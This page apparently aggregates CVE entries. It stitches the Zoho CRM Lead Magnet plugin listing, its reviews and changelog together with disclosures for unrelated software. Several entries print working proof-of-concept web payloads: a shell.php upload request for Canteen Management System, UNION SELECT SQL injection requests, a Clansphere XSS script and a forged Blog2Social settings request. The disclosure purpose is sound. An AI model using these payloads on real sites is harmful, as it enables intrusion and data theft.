Auth. (subscriber+) Arbitrary Options Update vulnerability in Zoho CRM Lead Magnet plugin <= 1.7.5.8 on WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Websites are one of the most important sources of leads for your business. That means your CRM system should be well integrated with your website to contextually capture each and every visitor to turn them into a lead.

Introducing the Zoho CRM Lead Magnet plugin for WordPress. This lets you create webforms, embed them in your website, and automatically capture leads directly into your CRM with zero attenuation.

Not only is the integration easy to set-up but it’s also easy on your wallet.

**Overall usage flow**

1.  Install the Zoho CRM forms plugin from the WordPress plugin Marketplace.
2.  Create a form using Zoho CRM webforms or Contact form 7 plugin.
3.  Configure the settings for your form.
4.  Use the short code to embed the form.
5.  A prospect’s information is automatically captured upon entering your site. All that’s left is lead nurturing.

For businesses that want to maximize their websites, the Zoho CRM Lead Capture plugin for WordPress CMS is an ideal solution.

**Key features**

Two forms, one solution

This plugin works well with forms created using Zoho CRM and Contact 7 Form plugin.

Light on code

Creating a form is incredibly simple and the entire process of establishing an integration involves a few drag-drops and copy-pastes. Simply create, embed, and capture.

  Capture leads and more

Using this plugin not only lets you capture leads but also additional custom modules you create for unique business needs.

  Capture. nurture. win.

The Information entered in a website’s form is automatically pushed into Zoho CRM with zero attenuation. Now you never miss out on another lead. 

Light on your purse

The plugin is absolutely free of cost. No hidden fees, no additional costs. All you need is a website hosted with WordPress and a Zoho CRM account.

Special mail-tags support

1.  \[\_url\]
2.  \[\_site\_title\]
3.  \[\_site\_description\]
4.  \[\_site\_url\]

For examples  
\[hidden get-url default:\_url\]  
\[hidden site\_title default:\_site\_title\]  
\[hidden site-description default:\_site\_description\]  
\[hidden site-url default:\_site\_url\]

Please feel free to contact us for any further assistance: **support@zohoextensions.com**

1.  Install the WordPress plugin from WordPress Marketplace. Upload the plugin folder to the /wp-content/plugins/ directory or install via the Add New Plugin menu.
2.  Activate the plugin through the ‘Plugins’ menu in WordPress.
3.  Once you activate your Zoho CRM forms plugin, you’ll be asked to authenticate access from Zoho CRM. To do that, simply  enter the username and password of your CRM account.

The plugin installation is now complete and the integration between Zoho CRM forms and WordPress is established.

How to download the old versions of this plugin

I discourage anyone from using this plugin. When it works, it does what it should. When it breaks, don't rely on Zoho for support. During two years of using the plugin, I've repeatedly been told by Zoho that it is simply not a Zoho product. Of course, it is managed and produced by the Zoho extensions team. And of course, occasionally I find someone at the Zoho Extensions team with time to investigate issues with this plugin, obviating the false claim from Zoho support teams that this is not a Zoho product. Three years after launch the plugin only has 3000 documented installations, which falls well below the threshold for user interest that would encourage reliable developer support. Zoho CRM email parsers not quite as efficient to set up, but if they break, they do not break functionality of live Webforms. I'll probably work with Zoho to fix whatever is broken in this, but more likely I'll be moving all my forms to an email parser for CRM integration.

Hi. I have this issue in Wordpress after installing the plugin Zoho CRM Lead Magnet in WP I have entered the Domain zoho.in, my Client Id and Client secret and when I click Authenticate Zoho CRM button I’m redirected to Zoho Accounts where I enter username/password but after that I get this error message “invalid\_redirect\_uri”. Thank you!

select { height: auto !important; } Are you kidding me? You singlehandedly destroyed all the selects on my website. Couldn't you just wrap your elements in some id or class?

It works really well with Contact Form 7 and Elementor together.

Using the forms as provided by Zoho. Anytime I attempt to submit Zoho forms, I get the following message: "Sorry, there were some issues in submitting your data. Please try again later"

Read all 21 reviews

“Zoho CRM Lead Magnet” is open source software. The following people have contributed to this plugin.

Contributors

*    Zoho CRM

**1.2**

*   Added: Contact form relation issue fixed.  
    1.3.1
*   Responsive issue fixed  
    1.3.2  
    Added jquery ui css file  
    1.3.4
*   Contact form hidden field issue fixed  
    1.3.5
*   jquery ui css file missing issue fixed  
    1.3.6
*   Multiselectpicklist hidden field issue fixed  
    1.4  
    Added functionality for EU Account  
    1.4.1  
    Css loading issue fixed  
    1.4.2  
    Checkbox mapping issue fixed  
    1.4.3  
    Registeration magic intergration merge issue fixed  
    1.4.4  
    We have added authorization url (https://extensions.zoho.com/plugin/wordpress/callback) and 402,403 authorization issue fixed  
    1.4.5  
    We have added authorization url (https://extensions.zoho.eu/plugin/wordpress/callback) issue fixed  
    1.4.6  
    We have added authorization url (https://extensions.zoho.eu/plugin/wordpress/callback) issue fixed  
    1.4.7  
    Code optimaztion  
    1.4.8  
    Code optimaztion  
    1.5.0  
    Specific layout issue fixed  
    1.5.1  
    Code optimaztion  
    1.5.2  
    Code optimaztion  
    1.5.3  
    Code optimaztion  
    1.5.4  
    EU Setup Authentication issue fixed  
    1.5.5  
    Field migration issue fixed  
    1.5.7  
    Added Multipicklist  
    1.5.8  
    Code optimaztion  
    1.5.9  
    Php version issue fixed  
    1.6.0  
    Code optimaztion  
    1.6.1  
    Contact form 7 captcha v3 api issue fixed  
    1.6.2  
    Contact form 7 v3 api script issue fixed  
    (Latest Contact form7 version)  
    1.6.3  
    Php Notice issue fixed  
    1.6.3  
    Php Notice issue fixed  
    1.6.6  
    Added Form Submit Logs  
    1.6.7  
    Added Form Submit Logs

1.6.8  
Custom module related issue fixed  
1.6.9  
Hidden field related issue fixed  
1.6.9.1  
Security issue fixed check\_admin\_referer  
1.6.9.2  
performance issue fixed  
1.6.9.3  
performance issue fixed  
1.6.9.4  
performance issue fixed  
1.6.9.5  
performance issue fixed  
1.6.9.6  
redirection url issue fixed  
1.6.9.7  
rewrite an arbitrary option added  
1.7.0.1  
Hidden field issue fixed  
1.7.0.2  
checkbox field issue fixed  
1.7.0.3  
Added au domain centre  
1.7.0.5  
Lead Score mapping issue fixed  
1.7.0.6  
Added in domain centre and hidden field issue fixed  
1.7.0.8  
Security issue fixed  
1.7.1.0  
Security issue fixed  
1.7.1.1  
Security issue fixed  
1.7.1.2  
Security issue fixed and latest version updated  
1.7.1.3  
added option for international telephone option  
1.7.1.4  
Modules log added  
1.7.1.5  
Modules log added  
1.7.1.6  
Loading issue fixed  
1.7.1.7  
Added user lookup  
1.7.2.0  
performance issue fixed  
1.7.2.1  
performance issue fixed  
1.7.2.5  
Security issue fixed  
1.7.2.6  
Latest wordpress version updated and Security issue fixed  
1.7.2.7  
Security issue has been fixed  
1.7.2.8  
Security issue has been fixed  
1.7.2.9  
Security issue has been fixed  
1.7.3.0  
Security issue has been fixed  
1.7.3.1  
Get-url and site description field support added  
1.7.3.2  
Special mail-tags support  
1.7.3.3  
Added: GCLID field Support in Zoho CRM for Contact Form 7.  
1.7.3.4  
Added: A new tab added in the Zoho authentication.  
1.7.3.5  
Added: webform form save script error fixed.  
1.7.3.6  
Added: performance issue fixed.  
1.7.3.7  
Added: UI changes.  
1.7.3.9  
Added: Script issue has been fixed.  
1.7.4.0  
Added:Added Authentication check.  
1.7.4.1  
Added: SSL verified issue fixed

1.7.4.4  
Added: GCLID field api issue fixed

1.7.4.5  
Added: Japan data centre authentication option added  
1.7.4.6  
Added: Multiselect hidden field issue fixed  
1.7.4.7  
Added: Api data added to logs  
1.7.4.8  
Added: Api data added to logs  
1.7.4.9  
Added: removed empty space for email id

1.7.5.1  
zcga.js file 404 issue fixed

1.7.5.2  
Added : added fetch field option in the contact form  
1.7.5.3  
Added: In Japan dc added check for email encode

1.7.5.4  
Added: Unused css removed

1.7.5.5  
Added : Select2 component z-index issue has been fixed

1.7.5.6  
Added : Unwanted Caching file has been removed

CVE-2022-41978: Zoho CRM Lead Magnet

Canteen Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via ip/youthappam/php_action/editFile.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Canteen Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: Qianxin Niu

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/youthappam/php\_action/editFile.php?id=1

Loophole location: Canteen Management System's editFile.php file exists arbitrary file upload (RCE)

Request package for file upload：‘

POST /youthappam/php\_action/editFile.php?id\=1 HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------88582622926272
Content-Length: 422
\-----------------------------88582622926272
Content-Disposition: form-data; name="old\_image"
\-----------------------------88582622926272
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------88582622926272
Content-Disposition: form-data; name="btn"
\-----------------------------88582622926272--

The files will be uploaded to this directory \\youthappam\\assets\\myimages\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-43277: bug_report/RCE-1.md at main · HuahuaDaren/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the categoriesId parameter at /php_action/fetchSelectedCategories.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Qianxin Niu

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchSelectedCategories.php

Vulnerability location: /youthappam/php\_action/fetchSelectedCategories.php, categoriesId

dbname =youthappam,length=10

\[+\] Payload: categoriesId=-1 union select 1,database(),3,4 // Leak place ---> categoriesId

POST /youthappam/php\_action/fetchSelectedCategories.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
categoriesId=-1 union select 1,database(),3,4

CVE-2022-43278: bug_report/SQLi-1.md at main · HuahuaDaren/bug_report

A cross-site scripting (XSS) vulnerability in Clansphere CMS v2011.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Username parameter.

Description

A cross-site scripting (XSS) issue in the Clansphere version 2011.4 allows remote attackers to inject JavaScript via the "username" Parameter

XSS Payload: <script>alert("username\_XSS")</script>

Vulnerable Parameter: username

Steps to Reproduce the Issue: POC: https://localhost/index.php?mod=buddy&action=create&id=925872

Screenshot: POC 1  

Impact

With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.

CVE-2022-43119: POC/Create Clansphere 2011.4 "username" xss.md at main · sinemsahn/POC

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /youthappam/editclient.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: songyangqi

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/editclient.php

Vulnerability location: /youthappam/editclient.php, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/editclient.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /youthappam/editclient.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

CVE-2022-43291: bug_report/SQLi-2.md at main · songyangqi/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /youthappam/editcategory.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: songyangqi

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/editcategory.php

Vulnerability location: /youthappam/editcategory.php, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/editcategory.php?id=-1%27%20union%20select%201,database(),3,4--+ // Leak place ---> id

GET /youthappam/editcategory.php?id\=\-1%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

CVE-2022-43290: bug_report/SQLi-1.md at main · songyangqi/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /youthappam/editfood.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: songyangqi

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/editfood.php

Vulnerability location: /youthappam/editfood.php, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/editfood.php?id=-1' union select 1,database(),3,4,5,6,7,8,9--+ // Leak place ---> id

GET /youthappam/editfood.php?id\=\-1' union select 1,database(),3,4,5,6,7,8,9--+ HTTP/1.1
Host: 192.168.1.88
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

CVE-2022-43292: bug_report/SQLi-3.md at main · songyangqi/bug_report

Shopwind v3.4.3 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the component /common/library/Page.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-43321: Reflected-XSS vulnerabilities via '/common/library/Page.php' · Issue #1 · shopwind/yii-shopwind

FeehiCMS v2.1.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the id parameter at /web/admin/index.php?r=log%2Fview-layer.

CVE-2022-43320: View log details Reflected-XSS vulnerabilities in the background. · Issue #4 · liufee/feehicms

WordPress Blog2Social versions 6.9.11 and below suffer from a missing authorization vulnerability.

Description: Missing Authorization to Authenticated (Subscriber+) Settings Update

Affected Plugin: Blog2Social

Plugin Slug: blog2social

Affected Versions: <= 6.9.11

CVE ID: CVE-2022-3622

CVSS Score: 4.7 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Researcher/s: Marco Wotschka

Fully Patched Version: 6.9.12

Blog2Social: Social Media Auto Post & Scheduler is a plugin offered by Blog2Social/Adenion that provides content-creators with the ability to quickly share site content to their social media accounts. It offers automatic post sharing as well as optimized scheduling and also extends some of its features to subscribers, enabling them to share posts to their own social media accounts.

As part of the plugin’s functionality, there are some more advanced settings that can be managed. Unfortunately, this was implemented insecurely making it possible for authenticated attackers to update these settings even without the authorization to do so.

More specifically, the plugin provides administrators with the ability to enable legacy mode, which is intended to reduce server load. In legacy mode, the plugin will load content one item at a time instead of loading all content in bulk in an attempt to reduce the likelihood of dashboard freeze-ups. In order to reduce the number of concurrent outgoing connections, legacy mode will also load connections to social media accounts in sequential order as opposed to doing so simultaneously. While functionality should not be significantly affected by this for most use cases, this legacy option setting is reserved for administrators only. Unfortunately, due to a lack of capability checking on the function and in the user interface, site subscribers had access to this setting via the dashboard:

/wp-admin/admin.php?page=blog2social-settings

Furthermore, the same URL offers access to a Social Meta Data tab, which contains forms that are disabled for non-administrative users. However, browsers offer inspector tools, which can be used to modify html on the fly in order to change properties of such forms and their elements. For instance, a save button with the following properties can be modified to become functional by removing the disabled attribute from the button:

<button class="btn btn-primary pull-right" disabled="disabled" type="submit">save</button> – as a result, such a form can be submitted by a subscriber. This indicates the developer used client-side validation, which can easily be bypassed by modifying the request sent to the server.

A request could be submitted using a third party tool similar to this one:

POST /wp-admin/admin-ajax.php HTTP/1.1

Host: 127.0.0.1

Cookie:

b2s_og_default_title=SiteTitle&b2s_og_default_desc=Just%20another%20WordPress%20site&b2s_og_default_image=&b2s_og_imagedata_active=1&b2s_og_objecttype_active=1&b2s_og_locale_active=1&b2s_og_locale=en_US&b2s_card_default_type=Summary&b2s_card_default_title=SiteTitle&b2s_card_default_desc=Just%20another%20WordPress%20site&b2s_card_default_image=&is_admin=1&version=0&action=b2s_save_social_meta_tags&b2s_security_nonce=<nonce>

This had consequences such as allowing subscribers to change social meta tags which could potentially be used to impact brand reputation.

A third issue that we discovered surrounded the plugin’s general authorization mechanism.

[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VWydX-1ZpVtDW5m3pbH5yxlc9W2C4PM94S6TLRN1sYgXV5mNXrV3Zsc37CgPpPW1_8BsQ650vs3W86NLQQ1Cb22gW8qlQJx717QmtN2Cx03MLNfRLW2-JNJb7nLtJDW6WM7R34PtmhMW1Q6y_X7lS_zWVjVDs36QWQxhVzcJwS8zW-6JW8R8sdQ5n8VyMW3xQZRx311bNnW52MK5T99M-WqN2bB3jwTbxZzW1VZPJL4W2QZ5W1sVXxZ2kr-JTTbvjx4xd9hxN1FlKQT1fwwDW7k9F6p6vRy5QVbh2jM4ll2JJW999K9x38XkPRW6ZTcyY2C85K-W5CC1TG1747mhW7gFskm1Y2Zy8W1f8khN7hdTbPVNS67c54W0xjW19nHJ55SGL4QW4BD90m6r6kRYW90HD6J3JT--YW9cg9wz21JSczW3tFWZp50-1qtW8wjp8m8gL9xyW7JNDB-5x1VB83f5z1 )

The first if-statement is intended to prevent unauthorized use of this function and similar functions using the same protection. The following parts need to evaluate to true in order for the if-statement to do the same:

- current_user_can('read') – This gives access to the administration screens and user profiles. This permission is generally available to all authenticated users such as subscribers.  
- isset($_POST['b2s_security_nonce']) – this nonce is set by the plugin and can be obtained by searching the code of /wp-admin/profile.php for the string ‘b2s_security_nonce’. This nonce is generated for subscribers and higher.  
- (int) wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['b2s_security_nonce'])), 'b2s_security_nonce') > 0 – this verifies the nonce after some sanitization.

As long as a userId is provided, we are able to lock B2S_LOCK_AUTO_POST_IMPORT_ for any user, resulting in that user being unable to automatically import posts. We found that many other functions lacked proper capability checks as well.

The Importance of Capability Checks

Capability checks are an important part of securing AJAX actions since those are available to any logged in users, including subscribers. The following is an example of an AJAX action from the Blog2Social plugin.

add_action('wp_ajax_b2s_lock_auto_post_import', array($this, 'lockAutoPostImport'));

While nonce checks ensure that the user initiating the request intended to do so, they don’t provide authorization. As mentioned above, the check current_user_can('read') does ensure that the user initiating the request has that specific capability, but it does not suffice to protect actions intended for administrators only. A proper way to secure such actions would be to utilize a check such as

current_user_can('manage_options').

The plugin does make use of B2S_PLUGIN_BLOG_USER_ID, which determines the current user’s ID in order to ensure that options saved are personalized thus preventing overwriting other users’ preferences:

define('B2S_PLUGIN_BLOG_USER_ID', get_current_user_id());

Timeline

October 1, 2022 – Initial outreach to the plugin developer.

October 5, 2022 – We disclosed details of the vulnerabilities with the developer.

October 6, 2022 – Version 6.9.11 is released which provides a patch for the legacy mode update vulnerability.

October 10, 2022 – The remaining authorization vulnerabilities are patched in version 6.9.12.

October 27, 2022 – Wordfence Premium, Care, and Response customers receive a firewall rule to provide additional protection.

November 26, 2022 – Wordfence Free users receive a firewall rule.

Conclusion

In today’s post, we covered several vulnerabilities in the Blog2Social: Social Media Auto Post & Scheduler plugin that could be used by subscribers to update plugin settings due to improper authorization checks. The vulnerabilities were patched by ensuring that capabilities were checked.

Wordfence Premium, Care, and Response users received a firewall rule on October 27th, 2022 for enhanced protection. Wordfence free users will receive this rule after 30 days on November 26th, 2022. We strongly recommend updating to version 6.9.12 or higher of Blog2Social: Social Media Auto Post & Scheduler to ensure that your site is protected against any exploits targeting this vulnerability.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care.  If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance. If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of Blog2Social as soon as possible.

Tag

#php